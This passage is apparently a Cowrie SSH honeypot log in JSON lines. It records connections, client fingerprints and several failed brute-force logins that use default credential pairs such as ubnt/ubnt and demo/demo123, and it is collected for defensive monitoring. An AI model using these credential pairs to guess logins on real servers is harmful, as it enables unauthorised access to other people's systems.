{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34466,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fa0a893d746","protocol":"ssh","message":"New connection: 212.227.125.160:34466 (1.2.3.4:22) [session: 2fa0a893d746]","sensor":"my-vps","timestamp":"2025-09-09T07:35:37.271671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:35:37.274875Z","src_ip":"212.227.125.160","session":"2fa0a893d746"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34328,"dst_ip":"1.2.3.4","dst_port":22,"session":"02d450a7dfc0","protocol":"ssh","message":"New connection: 212.227.125.160:34328 (1.2.3.4:22) [session: 02d450a7dfc0]","sensor":"my-vps","timestamp":"2025-09-09T07:36:08.535071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:36:08.536007Z","src_ip":"212.227.125.160","session":"02d450a7dfc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32812,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1d63b93e4bb","protocol":"ssh","message":"New connection: 212.227.125.160:32812 (1.2.3.4:22) [session: b1d63b93e4bb]","sensor":"my-vps","timestamp":"2025-09-09T07:36:23.594694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:36:28.906719Z","src_ip":"212.227.125.160","session":"b1d63b93e4bb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:36:30.193314Z","src_ip":"212.227.125.160","session":"b1d63b93e4bb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:36:47.265461Z","src_ip":"212.227.125.160","session":"2fa0a893d746"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:36:47.267528Z","src_ip":"212.227.125.160","session":"2fa0a893d746"}
{"eventid":"cowrie.login.failed","username":"installer","password":"installer","message":"login attempt [installer/installer] failed","sensor":"my-vps","timestamp":"2025-09-09T07:36:57.935793Z","src_ip":"212.227.125.160","session":"b1d63b93e4bb"}
{"eventid":"cowrie.session.closed","duration":"35.6","message":"Connection lost after 35.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:36:59.241623Z","src_ip":"212.227.125.160","session":"b1d63b93e4bb"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":51740,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2acf92c5e27","protocol":"ssh","message":"New connection: 92.118.39.62:51740 (1.2.3.4:22) [session: d2acf92c5e27]","sensor":"my-vps","timestamp":"2025-09-09T07:37:05.082853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T07:37:05.083513Z","src_ip":"92.118.39.62","session":"d2acf92c5e27"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T07:37:05.113634Z","src_ip":"92.118.39.62","session":"d2acf92c5e27"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo123","message":"login attempt [demo/demo123] failed","sensor":"my-vps","timestamp":"2025-09-09T07:37:05.205216Z","src_ip":"92.118.39.62","session":"d2acf92c5e27"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:37:06.237383Z","src_ip":"92.118.39.62","session":"d2acf92c5e27"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:37:07.252366Z","src_ip":"212.227.125.160","session":"02d450a7dfc0"}
{"eventid":"cowrie.session.closed","duration":"58.7","message":"Connection lost after 58.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:37:07.254825Z","src_ip":"212.227.125.160","session":"02d450a7dfc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52086,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f57fa6ea002","protocol":"ssh","message":"New connection: 212.227.125.160:52086 (1.2.3.4:22) [session: 6f57fa6ea002]","sensor":"my-vps","timestamp":"2025-09-09T07:38:40.080566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:38:40.103810Z","src_ip":"212.227.125.160","session":"6f57fa6ea002"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:38:41.524966Z","src_ip":"212.227.125.160","session":"6f57fa6ea002"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-09-09T07:38:49.581825Z","src_ip":"212.227.125.160","session":"6f57fa6ea002"}
{"eventid":"cowrie.session.closed","duration":"11.8","message":"Connection lost after 11.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:38:51.930170Z","src_ip":"212.227.125.160","session":"6f57fa6ea002"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38410,"dst_ip":"1.2.3.4","dst_port":22,"session":"54afaacad910","protocol":"ssh","message":"New connection: 212.227.125.160:38410 (1.2.3.4:22) [session: 54afaacad910]","sensor":"my-vps","timestamp":"2025-09-09T07:39:35.582282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:39:36.518132Z","src_ip":"212.227.125.160","session":"54afaacad910"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48048,"dst_ip":"1.2.3.4","dst_port":22,"session":"59723421fdac","protocol":"ssh","message":"New connection: 212.227.125.160:48048 (1.2.3.4:22) [session: 59723421fdac]","sensor":"my-vps","timestamp":"2025-09-09T07:39:56.504084Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:39:56.669998Z","src_ip":"212.227.125.160","session":"59723421fdac"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T07:40:03.676673Z","src_ip":"212.227.125.160","session":"54afaacad910"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-09-09T07:40:12.007547Z","src_ip":"212.227.125.160","session":"54afaacad910"}
{"eventid":"cowrie.session.closed","duration":"38.6","message":"Connection lost after 38.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:40:14.203842Z","src_ip":"212.227.125.160","session":"54afaacad910"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56404,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0cb8980237f","protocol":"ssh","message":"New connection: 212.227.125.160:56404 (1.2.3.4:22) [session: c0cb8980237f]","sensor":"my-vps","timestamp":"2025-09-09T07:41:39.015674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T07:41:39.289137Z","src_ip":"212.227.125.160","session":"c0cb8980237f"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"